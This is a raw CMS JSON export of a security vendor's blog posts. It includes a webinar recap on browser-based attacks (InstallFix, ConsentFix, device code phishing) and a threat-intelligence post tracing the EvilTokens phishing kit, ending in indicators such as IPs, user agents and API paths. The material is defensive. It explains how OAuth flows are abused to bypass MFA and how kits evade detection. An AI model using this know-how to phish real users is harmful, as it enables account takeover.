",{"data":13037,"content":13038,"nodeType":883},{"uri":13006},[13039],{"data":13040,"marks":13041,"value":13042,"nodeType":864},{},[],"detects ClickFix at the clipboard-injection stage",{"data":13044,"marks":13045,"value":13046,"nodeType":864},{},[],", before the payload ever reaches the endpoint, to bolster endpoint-level detections and extend protection to machines like BYOD, contractor, or developer devices where EDR is often missing or tuned-down.",{"data":13048,"content":13049,"nodeType":1005},{},[],{"data":13051,"content":13052,"nodeType":1009},{},[13053],{"data":13054,"marks":13055,"value":13057,"nodeType":864},{},[13056],{"type":899},"5. InstallFix turned the AI tool boom into an attack surface overnight",{"data":13059,"content":13060,"nodeType":860},{},[13061,13064,13071],{"data":13062,"marks":13063,"value":21,"nodeType":864},{},[],{"data":13065,"content":13066,"nodeType":883},{"uri":6024},[13067],{"data":13068,"marks":13069,"value":6029,"nodeType":864},{},[13070],{"type":1455},{"data":13072,"marks":13073,"value":13074,"nodeType":864},{},[]," — a ClickFix variant that clones legitimate developer tool installation pages and swaps the install command for a malicious payload — was one of the clearest examples of how quickly a new attack pattern can go from zero to dominant. Luke showed side-by-side comparisons of real and fake Claude Code installation pages that were visually identical except for the payload itself, and fake Notebook LM pages appearing as top Google sponsored results.",{"data":13076,"content":13077,"nodeType":860},{},[13078],{"data":13079,"marks":13080,"value":13081,"nodeType":864},{},[],"The trajectory Luke described was striking: \"It literally started one day and then it's just been nonstop for the last couple of months since it started. It obviously is working really well.\" John added that the Claude Code variant in particular has been \"running rampant,\" and that he personally knows someone who fell for it.",{"data":13083,"content":13084,"nodeType":860},{},[13085],{"data":13086,"marks":13087,"value":13088,"nodeType":864},{},[],"What makes InstallFix effective is that it exploits a workflow that's become completely normalized — the rise of AI tools has encouraged even non-technical users to install software via terminal commands copied from documentation pages. When the fake page looks identical to the real one and the install method is exactly what you'd expect, the only tell is a base64-encoded payload that most users wouldn't think to scrutinize.",{"data":13090,"content":13091,"nodeType":1005},{},[],{"data":13093,"content":13094,"nodeType":1009},{},[13095],{"data":13096,"marks":13097,"value":13099,"nodeType":864},{},[13098],{"type":899},"6. ConsentFix plays out entirely in the browser, and criminals just got the playbook",{"data":13101,"content":13102,"nodeType":860},{},[13103,13106,13113],{"data":13104,"marks":13105,"value":21,"nodeType":864},{},[],{"data":13107,"content":13108,"nodeType":883},{"uri":6036},[13109],{"data":13110,"marks":13111,"value":6041,"nodeType":864},{},[13112],{"type":1455},{"data":13114,"marks":13115,"value":13116,"nodeType":864},{},[]," was a key focus in the webinar, and for good reason — it represents a fundamentally different class of browser attack. Rather than proxying credentials (AiTM) or injecting endpoint payloads (ClickFix), ConsentFix abuses the OAuth authorization code flow via the Azure CLI's localhost redirect to obtain access tokens without ever touching a password or MFA prompt. As John put it: \"This one is really tricky because the entire attack and technique lives only within the browser. There are no little EDR artifacts to poke and play at.\"",{"data":13118,"content":13119,"nodeType":860},{},[13120],{"data":13121,"marks":13122,"value":13123,"nodeType":864},{},[],"Luke described how Push first detected ConsentFix in the wild — a genuine zero-day discovery that took multiple encounters to fully understand. The attackers were fingerprinting visitors by IP and browser, triggering the payload only once per visitor across all compromised sites, and performing conditional access checks on the email address provided before deciding whether to proceed. \"It took us seeing it a few times before we cracked it,\" Luke explained. \"And then we were like — wow. What is this? I've never seen this before.\"",{"data":13125,"content":13126,"nodeType":860},{},[13127,13131,13138],{"data":13128,"marks":13129,"value":13130,"nodeType":864},{},[],"The session then took an interesting turn when John revealed something he hadn't previously shared publicly: a  ",{"data":13132,"content":13133,"nodeType":883},{"uri":6075},[13134],{"data":13135,"marks":13136,"value":13137,"nodeType":864},{},[],"ConsentFix v3 toolkit",{"data":13139,"marks":13140,"value":13141,"nodeType":864},{},[]," posted on a well-known criminal forum, complete with a tutorial video, step-by-step instructions, and a zero-infrastructure approach using Cloudflare Workers for hosting, Dropbox for PDF delivery, and Pipedream as an automated exfiltration channel. \"They don’t need any infrastructure,\" John noted. \"They don’t have to host any servers or VPS. They could just cast this out to the whole wide world on the open internet.\"",{"data":13143,"content":13144,"nodeType":1116},{},[13145],{"data":13146,"content":13147,"nodeType":860},{},[13148],{"data":13149,"marks":13150,"value":13151,"nodeType":864},{},[],"Luke's assessment was clear: \"When we published our first article, we were thinking, surely we're going to see a huge increase in this technique. We haven't really — until now.\" ",{"data":13153,"content":13154,"nodeType":860},{},[13155],{"data":13156,"marks":13157,"value":13158,"nodeType":864},{},[],"With the criminal ecosystem now tooled up, the expectation is that ConsentFix will follow the same commoditization arc as other techniques discussed in the session.",{"data":13160,"content":13161,"nodeType":1005},{},[],{"data":13163,"content":13164,"nodeType":1009},{},[13165],{"data":13166,"marks":13167,"value":13169,"nodeType":864},{},[13168],{"type":899},"7. Device code phishing is the technique both speakers fear most (and it's just getting started)",{"data":13171,"content":13172,"nodeType":860},{},[13173,13177,13184],{"data":13174,"marks":13175,"value":13176,"nodeType":864},{},[],"When John asked Luke which technique felt most dangerous, the answer was immediate: ",{"data":13178,"content":13179,"nodeType":883},{"uri":3259},[13180],{"data":13181,"marks":13182,"value":13183,"nodeType":864},{},[],"device code phishing",{"data":13185,"marks":13186,"value":10094,"nodeType":864},{},[],{"data":13188,"content":13189,"nodeType":860},{},[13190],{"data":13191,"marks":13192,"value":13193,"nodeType":864},{},[],"The technique abuses the OAuth 2.0 device authorization grant flow — originally designed for input-constrained devices like TVs, but now primarily used in enterprise environments for CLI tool authentication (Azure CLI, GitHub CLI, AWS CLI). That everyday enterprise usage is exactly what makes the phishing so effective: users in developer-heavy organizations are already habituated to entering short codes as part of their normal workflow. The victim enters a code on a legitimate Microsoft login page, and if they're already authenticated, the entire compromise happens without entering a password or completing an MFA challenge.",{"data":13195,"content":13196,"nodeType":860},{},[13197],{"data":13198,"marks":13199,"value":13200,"nodeType":864},{},[],"Push is now tracking at least 12 distinct device code phishing kits, \"literally within the last couple of months — from basically zero to this.\" EvilTokens dominates at an estimated 90–95% of detected volume, but the kit landscape is diversifying fast. Luke's theory: every existing AiTM vendor is adding device code phishing as a module. When Push investigated the Venom kit, its AiTM component triggered existing Sneaky2FA detections — suggesting the same actors or codebase behind both. \"That's why we've seen such a rapid increase — it's worked so well that everyone is just doing the same thing now.\"",{"data":13202,"content":13203,"nodeType":860},{},[13204,13209],{"data":13205,"marks":13206,"value":13208,"nodeType":864},{},[13207],{"type":899},"What makes device code phishing uniquely dangerous is how little friction it presents to the victim.",{"data":13210,"marks":13211,"value":13212,"nodeType":864},{},[]," As Luke explained: \"It's purely identity-driven. It completely bypasses 2FA, even bypasses phishing-resistant factors like passkeys. And it's just not something that seems malicious to your average user. We haven't trained people to worry about being given a code and being told to type that code.\"",{"data":13214,"content":13215,"nodeType":1116},{},[13216],{"data":13217,"content":13218,"nodeType":860},{},[13219],{"data":13220,"marks":13221,"value":13222,"nodeType":864},{},[],"John's closing take: \"It still feels early and emergent, even though the technique has been known for a while. It hasn't been weaponized like it has right now. I think device code is just at the starting gun.\" ",{"data":13224,"content":13225,"nodeType":860},{},[13226,13230,13237],{"data":13227,"marks":13228,"value":13229,"nodeType":864},{},[],"The blast radius extends beyond Microsoft too — GitHub, Salesforce, and other platforms support the same underlying flow, and was exploited in 2025’s massive Salesforce campaign operated by ",{"data":13231,"content":13232,"nodeType":883},{"uri":4082},[13233],{"data":13234,"marks":13235,"value":4087,"nodeType":864},{},[13236],{"type":1455},{"data":13238,"marks":13239,"value":2924,"nodeType":864},{},[],{"data":13241,"content":13242,"nodeType":1005},{},[],{"data":13244,"content":13245,"nodeType":1009},{},[13246],{"data":13247,"marks":13248,"value":13250,"nodeType":864},{},[13249],{"type":899},"What ties all of this together",{"data":13252,"content":13253,"nodeType":860},{},[13254],{"data":13255,"marks":13256,"value":13257,"nodeType":864},{},[],"Every technique covered in the webinar — AiTM, ClickFix, InstallFix, ConsentFix, device code phishing — is designed to operate in or through the browser, abuse legitimate infrastructure and authentication flows, and evade the traditional security stack. Email gateways don't see them because the delivery vector increasingly isn't email. EDR doesn't reliably block them because the attack either breaks the process tree attribution (ClickFix) or never touches the endpoint at all (ConsentFix, device code phishing). Network proxies don't see them because the attack plays out in client-side page content, DOM interactions, and OAuth flows that are invisible to traffic inspection.",{"data":13259,"content":13260,"nodeType":860},{},[13261,13265,13271,13274,13281,13284,13291,13295,13302],{"data":13262,"marks":13263,"value":13264,"nodeType":864},{},[],"Push detects all of them — ",{"data":13266,"content":13267,"nodeType":883},{"uri":12922},[13268],{"data":13269,"marks":13270,"value":261,"nodeType":864},{},[],{"data":13272,"marks":13273,"value":12878,"nodeType":864},{},[],{"data":13275,"content":13276,"nodeType":883},{"uri":13006},[13277],{"data":13278,"marks":13279,"value":13280,"nodeType":864},{},[]," ClickFix and the *Fix family",{"data":13282,"marks":13283,"value":12878,"nodeType":864},{},[],{"data":13285,"content":13286,"nodeType":883},{"uri":6036},[13287],{"data":13288,"marks":13289,"value":13290,"nodeType":864},{},[]," ConsentFix",{"data":13292,"marks":13293,"value":13294,"nodeType":864},{},[],", and",{"data":13296,"content":13297,"nodeType":883},{"uri":3259},[13298],{"data":13299,"marks":13300,"value":13301,"nodeType":864},{},[]," device code phishing",{"data":13303,"marks":13304,"value":13305,"nodeType":864},{},[]," — through behavioral detection at the browser layer, regardless of delivery channel, domain reputation, or infrastructure rotation. The detections target technique-class behaviors rather than specific kits or indicators, which is why Push detected ConsentFix as a zero-day and why new kit variants are typically caught by existing detection logic before a kit-specific rule is even written.",{"data":13307,"content":13308,"nodeType":860},{},[13309,13312,13321,13325,13332],{"data":13310,"marks":13311,"value":21,"nodeType":864},{},[],{"data":13313,"content":13315,"nodeType":883},{"uri":13314},"https://pushsecurity.com/resources/browser-attacks-why-browser-new-battleground",[13316],{"data":13317,"marks":13318,"value":13320,"nodeType":864},{},[13319],{"type":1455},"Watch the full webinar",{"data":13322,"marks":13323,"value":13324,"nodeType":864},{},[]," to see the demos, attack chain timelines, and in-the-wild examples discussed in this post — or ",{"data":13326,"content":13327,"nodeType":883},{"uri":1700},[13328],{"data":13329,"marks":13330,"value":13331,"nodeType":864},{},[],"book a demo",{"data":13333,"marks":13334,"value":13335,"nodeType":864},{},[]," to see how Push handles them.",{"entries":13337},{"hyperlink":13338,"inline":13339,"block":13340},[],[],[13341],{"sys":13342,"__typename":1717,"type":1718,"ctaText":13343,"buttonLabel":13344,"buttonColour":1721,"buttonUrl":13314},{"id":12779},"Watch the full webinar on demand.","Watch now",{"items":13346},[],{},"7 things we learned from our conversation with John Hammond","thought-leadership","2026-05-19T00:00:00.000Z",{"items":13352},[13353,16359,17080],{"__typename":2059,"sys":13354,"content":13356,"title":16346,"synopsis":16347,"hashTags":59,"publishedDate":16348,"slug":361,"tagsCollection":16349,"authorsCollection":16355},{"id":13355},"5DmCqTU2Tg4adYScA5vT2x",{"json":13357},{"data":13358,"content":13359,"nodeType":856},{},[13360,13366,13386,13404,13411,13417,13424,13431,13434,13442,13448,13532,13552,13558,13565,13680,13686,13689,13697,13704,13710,13713,13721,13762,13768,13775,13782,13789,13796,13815,13821,13827,13833,13839,13845,13851,13857,13863,14126,14129,14137,14272,14278,14281,14289,14329,14463,14469,14472,14480,14627,14633,14636,14644,14650,14791,14797,14803,14806,14814,14961,14967,14970,14978,15124,15130,15133,15141,15236,15242,15245,15253,15347,15353,15356,15364,15370,15503,15509,15512,15520,15569,15575,15578,15586,15725,15730,15733,15741,15873,15879,15882,15890,15902,15909,15915,15921,15928,15949,15965,15971,15974,15982,15990,16011,16032,16037,16044,16051,16059,16066,16073,16080,16088,16095,16145,16151,16154,16162,16169,16176,16223,16229,16236,16239,16247,16254,16261,16281,16287,16294,16301,16308],{"data":13361,"content":13365,"nodeType":996},{"target":13362},{"sys":13363},{"id":13364,"type":1001,"linkType":1002},"XOFOeNqmRHeiRbkPOJrP1",[],{"data":13367,"content":13368,"nodeType":860},{},[13369,13373,13382],{"data":13370,"marks":13371,"value":13372,"nodeType":864},{},[],"The OAuth 2.0 ",{"data":13374,"content":13376,"nodeType":883},{"uri":13375},"https://www.rfc-editor.org/rfc/rfc8628",[13377],{"data":13378,"marks":13379,"value":13381,"nodeType":864},{},[13380],{"type":1455},"device authorization grant",{"data":13383,"marks":13384,"value":13385,"nodeType":864},{},[]," was designed to enable input-constrained devices to sign-in to apps by asking the user to complete the login on a separate device by entering a code. But today, it’s mainly used when accessing CLI tools, meaning that many users encounter the device code flow daily. ",{"data":13387,"content":13388,"nodeType":860},{},[13389,13392,13400],{"data":13390,"marks":13391,"value":21,"nodeType":864},{},[],{"data":13393,"content":13395,"nodeType":883},{"uri":13394},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_code_phishing/description.md",[13396],{"data":13397,"marks":13398,"value":360,"nodeType":864},{},[13399],{"type":1455},{"data":13401,"marks":13402,"value":13403,"nodeType":864},{},[]," attacks designed to exploit this authorization flow are not new — it was among the first techniques that we added to the SaaS attacks matrix back in 2023. But it’s taken until now for it to really enter mainstream adoption. ",{"data":13405,"content":13406,"nodeType":860},{},[13407],{"data":13408,"marks":13409,"value":13410,"nodeType":864},{},[],"The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly). Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. That said, Microsoft is, as always, much more heavily targeted at scale now than any other app.",{"data":13412,"content":13416,"nodeType":996},{"target":13413},{"sys":13414},{"id":13415,"type":1001,"linkType":1002},"Al0pGH8vmOYiufDFiAbt0",[],{"data":13418,"content":13419,"nodeType":860},{},[13420],{"data":13421,"marks":13422,"value":13423,"nodeType":864},{},[],"We’ve always been surprised that attackers haven’t commonly used device code phishing in their standard toolkit, preferring session-stealing AITM phishing and other social engineering attacks like ClickFix. But it’s pretty clear from the recent data that the shift to mainstream adoption has now happened. ",{"data":13425,"content":13426,"nodeType":860},{},[13427],{"data":13428,"marks":13429,"value":13430,"nodeType":864},{},[],"In this blog post, we’ll explore the history of device code phishing, what’s changed for it to enter mainstream adoption, how it works under the hood (with recent examples), and what security teams can do about it. ",{"data":13432,"content":13433,"nodeType":1005},{},[],{"data":13435,"content":13436,"nodeType":1009},{},[13437],{"data":13438,"marks":13439,"value":13441,"nodeType":864},{},[13440],{"type":899},"A brief history of device code phishing",{"data":13443,"content":13447,"nodeType":996},{"target":13444},{"sys":13445},{"id":13446,"type":1001,"linkType":1002},"6u3DgvSGChtTJu7l9I7PG1",[],{"data":13449,"content":13450,"nodeType":860},{},[13451,13455,13464,13468,13477,13481,13490,13494,13503,13507,13516,13519,13528],{"data":13452,"marks":13453,"value":13454,"nodeType":864},{},[],"The technique was first documented in 2020, before Secureworks released the first tooling framework ",{"data":13456,"content":13458,"nodeType":883},{"uri":13457},"https://github.com/secureworks/PhishInSuits",[13459],{"data":13460,"marks":13461,"value":13463,"nodeType":864},{},[13462],{"type":1455},"PhishInSuits",{"data":13465,"marks":13466,"value":13467,"nodeType":864},{},[]," a year later. A host of research followed, including ",{"data":13469,"content":13471,"nodeType":883},{"uri":13470},"https://github.com/secureworks/squarephish",[13472],{"data":13473,"marks":13474,"value":13476,"nodeType":864},{},[13475],{"type":1455},"SquarePhish",{"data":13478,"marks":13479,"value":13480,"nodeType":864},{},[]," v1 (using QR codes to trigger the 15 minute code expiration window), Dirk-Jan Mollema’s ",{"data":13482,"content":13484,"nodeType":883},{"uri":13483},"https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/",[13485],{"data":13486,"marks":13487,"value":13489,"nodeType":864},{},[13488],{"type":1455},"key research",{"data":13491,"marks":13492,"value":13493,"nodeType":864},{},[]," (chaining device code phishing via Microsoft apps into Primary Refresh Token (PRT) acquisition to gain full browser-level access) and Dennis Kniep’s ",{"data":13495,"content":13497,"nodeType":883},{"uri":13496},"https://github.com/denniskniep/DeviceCodePhishing",[13498],{"data":13499,"marks":13500,"value":13502,"nodeType":864},{},[13501],{"type":1455},"DeviceCodePhishing tool",{"data":13504,"marks":13505,"value":13506,"nodeType":864},{},[]," which automates the entire flow with a headless browser. (Other recent noteworthy tools include ",{"data":13508,"content":13510,"nodeType":883},{"uri":13509},"https://github.com/nromsdahl/squarephish2",[13511],{"data":13512,"marks":13513,"value":13515,"nodeType":864},{},[13514],{"type":1455},"SquarePhish2",{"data":13517,"marks":13518,"value":902,"nodeType":864},{},[],{"data":13520,"content":13522,"nodeType":883},{"uri":13521},"https://github.com/praetorian-inc/GitPhish",[13523],{"data":13524,"marks":13525,"value":13527,"nodeType":864},{},[13526],{"type":1455},"GitPhish",{"data":13529,"marks":13530,"value":13531,"nodeType":864},{},[],", so shout out to those too). ",{"data":13533,"content":13534,"nodeType":860},{},[13535,13539,13548],{"data":13536,"marks":13537,"value":13538,"nodeType":864},{},[],"It wasn’t until August 2024 that in-the-wild exploitation was first identified, with Russia-linked campaigns then continuing into 2025 before entering mainstream criminal adoption. This trend has continued to gather momentum in 2026 with ",{"data":13540,"content":13542,"nodeType":883},{"uri":13541},"https://thehackernews.com/2026/03/device-code-phishing-hits-340-microsoft.html",[13543],{"data":13544,"marks":13545,"value":13547,"nodeType":864},{},[13546],{"type":1455},"EvilTokens",{"data":13549,"marks":13550,"value":13551,"nodeType":864},{},[],", the first reported criminal PhaaS kit for device code phishing, already powering massive campaigns after launching in February. ",{"data":13553,"content":13557,"nodeType":996},{"target":13554},{"sys":13555},{"id":13556,"type":1001,"linkType":1002},"6xsfmbYEzpW7CdDiNzO6cu",[],{"data":13559,"content":13560,"nodeType":860},{},[13561],{"data":13562,"marks":13563,"value":13564,"nodeType":864},{},[],"Some of the noteworthy in-the-wild campaigns include:",{"data":13566,"content":13567,"nodeType":941},{},[13568,13601,13621],{"data":13569,"content":13570,"nodeType":945},{},[13571],{"data":13572,"content":13573,"nodeType":860},{},[13574,13578,13586,13589,13597],{"data":13575,"marks":13576,"value":13577,"nodeType":864},{},[],"Storm-2372, tracked by ",{"data":13579,"content":13581,"nodeType":883},{"uri":13580},"https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/",[13582],{"data":13583,"marks":13584,"value":13585,"nodeType":864},{},[],"Microsoft",{"data":13587,"marks":13588,"value":902,"nodeType":864},{},[],{"data":13590,"content":13592,"nodeType":883},{"uri":13591},"https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/",[13593],{"data":13594,"marks":13595,"value":13596,"nodeType":864},{},[],"Volexity",{"data":13598,"marks":13599,"value":13600,"nodeType":864},{},[],", linked to multiple Russia-aligned clusters, combining spear-phishing and social engineering with device code phishing payloads against strategic intelligence targets.",{"data":13602,"content":13603,"nodeType":945},{},[13604],{"data":13605,"content":13606,"nodeType":860},{},[13607,13611,13617],{"data":13608,"marks":13609,"value":13610,"nodeType":864},{},[],"The massive Salesforce campaign operated by ",{"data":13612,"content":13613,"nodeType":883},{"uri":6237},[13614],{"data":13615,"marks":13616,"value":6242,"nodeType":864},{},[],{"data":13618,"marks":13619,"value":13620,"nodeType":864},{},[]," (SLH) combined vishing with a device code phishing payload targeting Salesforce. The attacks morphed into a broader supply chain campaign using stolen credentials, ultimately resulting in 1000+ organizations being compromised and over 1.5 billion stolen records claimed. ",{"data":13622,"content":13623,"nodeType":945},{},[13624],{"data":13625,"content":13626,"nodeType":860},{},[13627,13631,13639,13643,13652,13655,13664,13668,13676],{"data":13628,"marks":13629,"value":13630,"nodeType":864},{},[],"A massive spike in activity in late 2025 and 2026. This includes ",{"data":13632,"content":13634,"nodeType":883},{"uri":13633},"https://www.proofpoint.com/us/blog/threat-insight/access-granted-phishing-device-code-authorization-account-takeover",[13635],{"data":13636,"marks":13637,"value":13638,"nodeType":864},{},[],"multiple threat clusters",{"data":13640,"marks":13641,"value":13642,"nodeType":864},{},[]," tracked using device code phishing techniques, more ",{"data":13644,"content":13646,"nodeType":883},{"uri":13645},"https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/",[13647],{"data":13648,"marks":13649,"value":13651,"nodeType":864},{},[13650],{"type":1455},"criminal operations linked to SLH",{"data":13653,"marks":13654,"value":2232,"nodeType":864},{},[],{"data":13656,"content":13658,"nodeType":883},{"uri":13657},"https://newtonpaul.com/blog/device-code-phish-update/",[13659],{"data":13660,"marks":13661,"value":13663,"nodeType":864},{},[13662],{"type":1455},"hundreds of organizations being targeted via PhaaS architecture,",{"data":13665,"marks":13666,"value":13667,"nodeType":864},{},[]," which looks to be the same campaign as the recently uncovered EvilTokens PhaaS reported by ",{"data":13669,"content":13670,"nodeType":883},{"uri":7591},[13671],{"data":13672,"marks":13673,"value":13675,"nodeType":864},{},[13674],{"type":1455},"Huntress",{"data":13677,"marks":13678,"value":13679,"nodeType":864},{},[]," (featuring abuse of the Railway PaaS platform). ",{"data":13681,"content":13685,"nodeType":996},{"target":13682},{"sys":13683},{"id":13684,"type":1001,"linkType":1002},"3WLt6qLCK8CSwr0QZxZiMv",[],{"data":13687,"content":13688,"nodeType":1005},{},[],{"data":13690,"content":13691,"nodeType":1009},{},[13692],{"data":13693,"marks":13694,"value":13696,"nodeType":864},{},[13695],{"type":899},"What we’re seeing in the wild",{"data":13698,"content":13699,"nodeType":860},{},[13700],{"data":13701,"marks":13702,"value":13703,"nodeType":864},{},[],"As mentioned, we’ve also seen a huge spike in device code phishing activity this year, with multiple kits, page designs, and lure types. We’ve now identified 14+ distinct kits in circulation in the wild, with EvilTokens being the most prevalent. It’s clear that attackers are both spinning up their own kits and creative derivatives of others — we’ve seen kits that are visually similar to EvilTokens (close enough to be clones or forks) but with very different backends, for example AWS, Digital Ocean, 2cloud, and more. ",{"data":13705,"content":13709,"nodeType":996},{"target":13706},{"sys":13707},{"id":13708,"type":1001,"linkType":1002},"nJCbTw85GKXdqrlIkzZwi",[],{"data":13711,"content":13712,"nodeType":1005},{},[],{"data":13714,"content":13715,"nodeType":1312},{},[13716],{"data":13717,"marks":13718,"value":13720,"nodeType":864},{},[13719],{"type":899},"“ANTIBOT” (EvilTokens)",{"data":13722,"content":13723,"nodeType":860},{},[13724,13727,13734,13737,13746,13750,13758],{"data":13725,"marks":13726,"value":21,"nodeType":864},{},[],{"data":13728,"content":13729,"nodeType":883},{"uri":7591},[13730],{"data":13731,"marks":13732,"value":13675,"nodeType":864},{},[13733],{"type":1455},{"data":13735,"marks":13736,"value":3731,"nodeType":864},{},[],{"data":13738,"content":13740,"nodeType":883},{"uri":13739},"https://blog.sekoia.io/new-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1/",[13741],{"data":13742,"marks":13743,"value":13745,"nodeType":864},{},[13744],{"type":1455},"Sekoia",{"data":13747,"marks":13748,"value":13749,"nodeType":864},{},[],", and researcher ",{"data":13751,"content":13752,"nodeType":883},{"uri":13657},[13753],{"data":13754,"marks":13755,"value":13757,"nodeType":864},{},[13756],{"type":1455},"Paul Newton",{"data":13759,"marks":13760,"value":13761,"nodeType":864},{},[]," have already done a great job of providing IOCs for the recent EvilTokens activity spike, including multiple backend Railway IPs in authentication events. ",{"data":13763,"content":13767,"nodeType":996},{"target":13764},{"sys":13765},{"id":13766,"type":1001,"linkType":1002},"1XNviq5OvMf5TEAc59F6g5",[],{"data":13769,"content":13770,"nodeType":860},{},[13771],{"data":13772,"marks":13773,"value":13774,"nodeType":864},{},[],"Beyond the most widely observed implementation featuring a Cloudflare Workers frontend and Railway backend for authentication, we’ve also tracked additional versions of EvilTokens in circulation since January 2026 (many of which remain live along with the current “production” version of the kit). ",{"data":13776,"content":13777,"nodeType":860},{},[13778],{"data":13779,"marks":13780,"value":13781,"nodeType":864},{},[],"You can see an evolution of the kit in the videos and screenshots below, from early precursors seen in mid-January, the first mentions of ANTIBOT in the page code in late-January, the parallel development of a “Courts Access” fork that lacks the ANTIBOT references, and finally production EvilTokens in February. One of the key threads between the versions is the presence of a generateFallbackCode() JS function and use of a /generate-codes API call. ",{"data":13783,"content":13784,"nodeType":860},{},[13785],{"data":13786,"marks":13787,"value":13788,"nodeType":864},{},[],"Early implementations were quite different, for example using ScrapingBee to generate the displayed code, and varied hosting on vercel, fastly, edgeone, and others. ",{"data":13790,"content":13791,"nodeType":860},{},[13792],{"data":13793,"marks":13794,"value":13795,"nodeType":864},{},[],"After initially appearing on custom domains, the production version is now predominantly hosted on Cloudflare Workers, as per the broader tracking of the campaign. The descriptive HTML comments around ANTIBOT functions have also been removed in later versions. ",{"data":13797,"content":13798,"nodeType":860},{},[13799,13803,13811],{"data":13800,"marks":13801,"value":13802,"nodeType":864},{},[],"The production version of EvilTokens showcases common ",{"data":13804,"content":13805,"nodeType":883},{"uri":7124},[13806],{"data":13807,"marks":13808,"value":13810,"nodeType":864},{},[13809],{"type":1455},"detection evasion techniques",{"data":13812,"marks":13813,"value":13814,"nodeType":864},{},[]," we've come to associate with PhaaS kits in the AiTM space — using multiple redirects through trusted sites before serving the malicious page, using bot protection to block security tools from analyzing the page, and so on. It also uses a pop-up window for the device code entry rather than a redirect, reducing the friction for the victim (it looks pretty convincing, too).",{"data":13816,"content":13820,"nodeType":996},{"target":13817},{"sys":13818},{"id":13819,"type":1001,"linkType":1002},"73rNOIEDPfP5IJwpFaxVc2",[],{"data":13822,"content":13826,"nodeType":996},{"target":13823},{"sys":13824},{"id":13825,"type":1001,"linkType":1002},"5BJSvOQUW9UpsQtoDNtgTC",[],{"data":13828,"content":13832,"nodeType":996},{"target":13829},{"sys":13830},{"id":13831,"type":1001,"linkType":1002},"3dbePPxVb4h4SauGg3glIL",[],{"data":13834,"content":13838,"nodeType":996},{"target":13835},{"sys":13836},{"id":13837,"type":1001,"linkType":1002},"1UOLcmNQvOsL5tdLSVuviq",[],{"data":13840,"content":13844,"nodeType":996},{"target":13841},{"sys":13842},{"id":13843,"type":1001,"linkType":1002},"55XRqLSwUUi2D4ZVpJboml",[],{"data":13846,"content":13850,"nodeType":996},{"target":13847},{"sys":13848},{"id":13849,"type":1001,"linkType":1002},"5wg5yr2Lo8t3f72ZV815c",[],{"data":13852,"content":13856,"nodeType":996},{"target":13853},{"sys":13854},{"id":13855,"type":1001,"linkType":1002},"35cowlL6i3rkGXOGmSxlI1",[],{"data":13858,"content":13859,"nodeType":860},{},[13860],{"data":13861,"marks":13862,"value":21,"nodeType":864},{},[],{"data":13864,"content":13865,"nodeType":4845},{},[13866,13890,13973,14025,14049],{"data":13867,"content":13868,"nodeType":4581},{},[13869,13880],{"data":13870,"content":13871,"nodeType":4569},{},[13872],{"data":13873,"content":13874,"nodeType":860},{},[13875],{"data":13876,"marks":13877,"value":13879,"nodeType":864},{},[13878],{"type":899},"Frontend infrastructure",{"data":13881,"content":13882,"nodeType":4569},{},[13883],{"data":13884,"content":13885,"nodeType":860},{},[13886],{"data":13887,"marks":13888,"value":13889,"nodeType":864},{},[],"Workers.dev, vercel.app, github.io, fastly.net, edgeone.dev",{"data":13891,"content":13892,"nodeType":4581},{},[13893,13904],{"data":13894,"content":13895,"nodeType":4569},{},[13896],{"data":13897,"content":13898,"nodeType":860},{},[13899],{"data":13900,"marks":13901,"value":13903,"nodeType":864},{},[13902],{"type":899},"Backend infrastructure",{"data":13905,"content":13906,"nodeType":4569},{},[13907,13937],{"data":13908,"content":13909,"nodeType":860},{},[13910,13915,13919,13924,13928,13933],{"data":13911,"marks":13912,"value":13914,"nodeType":864},{},[13913],{"type":899},"Example IP: (V3) ",{"data":13916,"marks":13917,"value":13918,"nodeType":864},{},[],"162.220.232.71 (Railway AS400940) ",{"data":13920,"marks":13921,"value":13923,"nodeType":864},{},[13922],{"type":899},"(V2)",{"data":13925,"marks":13926,"value":13927,"nodeType":864},{},[]," 71.11.42.193 ",{"data":13929,"marks":13930,"value":13932,"nodeType":864},{},[13931],{"type":899},"(V1) ",{"data":13934,"marks":13935,"value":13936,"nodeType":864},{},[],"72.218.25.107",{"data":13938,"content":13939,"nodeType":860},{},[13940,13945,13948,13953,13957,13961,13965,13969],{"data":13941,"marks":13942,"value":13944,"nodeType":864},{},[13943],{"type":899},"Backend User Agent:",{"data":13946,"marks":13947,"value":1171,"nodeType":864},{},[],{"data":13949,"marks":13950,"value":13952,"nodeType":864},{},[13951],{"type":899},"(V3) ",{"data":13954,"marks":13955,"value":13956,"nodeType":864},{},[],"node, ",{"data":13958,"marks":13959,"value":13923,"nodeType":864},{},[13960],{"type":899},{"data":13962,"marks":13963,"value":13964,"nodeType":864},{},[],", Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 ",{"data":13966,"marks":13967,"value":13932,"nodeType":864},{},[13968],{"type":899},{"data":13970,"marks":13971,"value":13972,"nodeType":864},{},[],"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 ",{"data":13974,"content":13975,"nodeType":4581},{},[13976,13987],{"data":13977,"content":13978,"nodeType":4569},{},[13979],{"data":13980,"content":13981,"nodeType":860},{},[13982],{"data":13983,"marks":13984,"value":13986,"nodeType":864},{},[13985],{"type":899},"Network paths",{"data":13988,"content":13989,"nodeType":4569},{},[13990,13997,14004,14011,14018],{"data":13991,"content":13992,"nodeType":860},{},[13993],{"data":13994,"marks":13995,"value":13996,"nodeType":864},{},[],"/api/rate-limit ",{"data":13998,"content":13999,"nodeType":860},{},[14000],{"data":14001,"marks":14002,"value":14003,"nodeType":864},{},[],"/api/fingerprint ",{"data":14005,"content":14006,"nodeType":860},{},[14007],{"data":14008,"marks":14009,"value":14010,"nodeType":864},{},[],"/api/captcha-verify 